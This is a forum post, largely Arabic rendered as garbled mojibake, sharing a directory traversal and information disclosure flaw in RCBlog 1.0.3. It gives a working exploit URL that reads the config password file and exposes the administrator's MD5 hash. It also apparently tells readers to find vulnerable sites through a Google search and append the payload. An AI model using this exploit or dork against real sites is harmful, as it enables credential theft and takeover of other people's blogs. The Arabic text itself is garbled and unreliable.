Members Login
Username 
 
Password 
    Remember Me  
Post Info TOPIC: ËÛÑå ÈÊÇÑíÎ 2006.1.19
Anonymous

Date:
ËÛÑå ÈÊÇÑíÎ 2006.1.19
Permalink   
 







ÇáÓáÇã Úáíßã æÑÍãÉ Çááå æÈÑßÇÊå

ÌÇíÈáßã ËÛÑå ØÇÒÌå ÌÏíÏå


ÃÓãåÇ RCBlog Directory Traversal & Sensitive Information Disclosure

ÎØæÑÊåÇ Þæíå ÊÎáíß ÊÊÕá ÈÞæÇÚÏÇáÈíÇäÇÊ ÚÈÑ ãáÝ config

ÇáÈÑäÇãÌ ÇáãÕÇÈ RCBlog 1.0.3

ãÚáæãÇÊ Úä ÇáËÛÑå


. Directories data config are not protected by htaccess in default installiation. This can be used to retrieve registered user's information including logins and password's md5 hashes.


2. Directory traversal is possible.

Vulnerable script: index.php
Variable $_GET[post] isn't properly sanitized. This can be used to open arbitrary files with txt extention. Administrator's login and password is threatened.

Administrator has an ability to upload arbitrary files.

System access is possible.

ÇáÃÓÊÛáÇá



ßæÏ:http://host/rcblog/index.php? post=../config/passwordÊÓæí ÈÍË Ýí ÌæÌá Úä



ßæÏ:rcblog/index.php?
æÊÖíÝ

ßæÏ:post=../config/password
æíÙåÑ ÇáÈÇÓæÑÏ ÇáÃÏãä ãÔÝÑ md5

æÔßÜÑÇð

ÇáåßÑ Çáíãäí

ÇáåßÑ Çáíãäí is offline  


__________________
Page 1 of 1  sorted by
 Add/remove tags to this thread
Quick Reply

Please log in to post quick replies.

Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse
Powered by ActiveBoard